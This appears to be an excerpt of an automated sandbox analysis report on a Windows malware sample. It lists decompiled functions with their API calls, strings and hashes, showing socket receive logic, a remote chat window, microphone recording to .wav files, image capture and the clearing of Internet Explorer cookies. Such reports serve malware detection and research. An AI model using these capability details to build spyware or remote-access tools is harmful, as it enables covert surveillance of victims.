                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F7B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@?size@?$basic_string@$?c_str@?$basic_string@GdipImageLoadStreamV01@@V10@@$AddressCreateD@1@@FromGdiplusLibraryProcSaveStartupThread_itoaconnectmallocsocket
                                                • String ID: Shlwapi.dll$image/jpeg
                                                • API String ID: 4077105796-2405822940
                                                • Opcode ID: 744f190398c45c5295d74e012c4cd3f911941621ca571fd9729935498b805eda
                                                • Instruction ID: 0902b66ebe8e66bcf283abf585539d0e06dcd29df124a44d81a897caf893abc6
                                                • Opcode Fuzzy Hash: 744f190398c45c5295d74e012c4cd3f911941621ca571fd9729935498b805eda
                                                • Instruction Fuzzy Hash: 8D716A72900218ABDB14EFA0DC999EF7779FF04305F00847AF506A7191EBB85E48CB69
                                                Function 00403392 Relevance: 42.2, APIs: 28, Instructions: 171networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004033B7
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004033CA
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004033D3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004033F6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403403
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040340F
                                                • recv.WS2_32(?,?,0000FDE8,00000000), ref: 00403435
                                                • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,?,?,0000FDE8,00000000), ref: 00403452
                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040345F
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403474
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00403482
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?), ref: 0040349A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034D1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034DA
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000FDE8), ref: 004034FE
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00403518
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403526
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403530
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040354A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403553
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040355C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000FDE8,6C995E04), ref: 00403579
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403583
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040358C
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040359E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0000FDE8,00000000), ref: 004035A9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035B2
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??0?$basic_string@$?size@?$basic_string@D@1@@$??4?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@V12@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?substr@?$basic_string@D@2@@0@V?$basic_string@recv
                                                • String ID:
                                                • API String ID: 2818948955-0
                                                • Opcode ID: aa899feeba4e6f35b80c8897467dae3091108f0991ed6115fa67930e850ae9d9
                                                • Instruction ID: 04fde0090eaa549d1e8094109e4273bbcff85efc6524e75e66a8ef0d5c5eb47d
                                                • Opcode Fuzzy Hash: aa899feeba4e6f35b80c8897467dae3091108f0991ed6115fa67930e850ae9d9
                                                • Instruction Fuzzy Hash: A051E97190001AEBCF05EF90DC998EE7F39EB15306F0441BAF506A61A1DB74AB86CB58
                                                Function 00402899 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 158windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004028AC
                                                • SetEvent.KERNEL32(?), ref: 004028B5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028BE
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 004028D6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 004028E6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004028F5
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00402930
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402943
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00402975
                                                • TranslateMessage.USER32(?), ref: 00402983
                                                • DispatchMessageA.USER32(?), ref: 0040298D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041375C,?), ref: 0040295F
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004029AA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(004196B0,00000000,DisplayMessage), ref: 00402A02
                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402A14
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402A3A
                                                • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402A4E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A61
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@Heap$??2@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeG@1@@TranslateV01@
                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                • API String ID: 2864085590-749203953
                                                • Opcode ID: 7b7e8488cc582310fffac7f2844346b6e6a38be584062e378a8ea1a5e3e3711c
                                                • Instruction ID: 9dc0e8f0f69231712d3938dd2f291ba0f5608cd30a61ea6cba1fa0a16a13e7a5
                                                • Opcode Fuzzy Hash: 7b7e8488cc582310fffac7f2844346b6e6a38be584062e378a8ea1a5e3e3711c
                                                • Instruction Fuzzy Hash: 67516171A00215ABCB05BFB5DC5D8EE7B7CEB44716B008476F602F21E1DB789A458B98
                                                Function 0040193B Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040194B
                                                • time.MSVCRT(?), ref: 00401963
                                                • localtime.MSVCRT(?), ref: 0040196D
                                                • strftime.MSVCRT ref: 00401982
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00401999
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,004191C8,0000005C,00000000,.wav), ref: 004019BF
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004019CC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004019D9
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004019E5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004019EE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004019F7
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A00
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A09
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401A12
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419180,?,?,?,?,?,?,?,00000000,.wav), ref: 00401A21
                                                  • Part of subcall function 004016B9: CreateFileW.KERNEL32(00401A2D,40000000,00000000,00000000,00000002,00000080,00000000,?,00419180), ref: 0040171F
                                                • waveInUnprepareHeader.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A38
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401A43
                                                • waveInPrepareHeader.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A77
                                                • waveInAddBuffer.WINMM(00419180,00000020,?,?,?,?,?,?,00000000,.wav), ref: 00401A86
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                                • String ID: %Y-%m-%d %H.%M$.wav
                                                • API String ID: 4079669728-3597965672
                                                • Opcode ID: e063c5905416d0dbe44c7f481c18e9f1c4d86861447538576e38388ea8e43436
                                                • Instruction ID: ab5e3de388326a7a35f7dac87b9ba25e6a52d4b640695524d1efe7d84f6a5c4e
                                                • Opcode Fuzzy Hash: e063c5905416d0dbe44c7f481c18e9f1c4d86861447538576e38388ea8e43436
                                                • Instruction Fuzzy Hash: 09418A7184020ABFDB04EFA0EC5DADE7B7CEB14316F008476F506E61A4EB745A89CB59
                                                Function 004016B9 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 154fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00401A2D,40000000,00000000,00000000,00000002,00000080,00000000,?,00419180), ref: 0040171F
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,00419180), ref: 00401746
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,00419180), ref: 00401754
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,00419180), ref: 00401763
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,00419180), ref: 00401772
                                                • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,00419180), ref: 00401780
                                                • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,00419180), ref: 0040178E
                                                • WriteFile.KERNEL32(00000000,004191FA,00000002,00000010,00000000,?,00419180), ref: 0040179D
                                                • WriteFile.KERNEL32(00000000,004191FC,00000004,00000010,00000000,?,00419180), ref: 004017AC
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,00419180), ref: 004017BA
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,00419180), ref: 004017C8
                                                • WriteFile.KERNEL32(00000000,00419206,00000002,00000010,00000000,?,00419180), ref: 004017D7
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,00419180), ref: 004017E6
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,00419180), ref: 004017F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: 0ce33b44e164a9aa3a7e5645998a216147184dd4306f05d11505a37ad87fba25
                                                • Instruction ID: 22ebf2cd207699d837bc11439f4c6581057990142ceedffd1051dec651382149
                                                • Opcode Fuzzy Hash: 0ce33b44e164a9aa3a7e5645998a216147184dd4306f05d11505a37ad87fba25
                                                • Instruction Fuzzy Hash: 0F4101F654021C7ADB209F61DC85FEB7FBCEB85B50F008416BA06EA181D674D744CBA4
                                                Function 00406B78 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406B8A
                                                  • Part of subcall function 0040A87F: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040A8AE
                                                  • Part of subcall function 0040A87F: RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000000,?,00000400), ref: 0040A8CB
                                                  • Part of subcall function 0040A87F: RegCloseKey.ADVAPI32(80000002), ref: 0040A8D4
                                                  • Part of subcall function 0040A87F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040A8F3
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406BB5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406BBE
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00406BCD
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies not found],?), ref: 00406BE8
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00406C0E
                                                • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00406C15
                                                • PathFileExistsA.SHLWAPI(?), ref: 00406C22
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00406C3B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406CEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
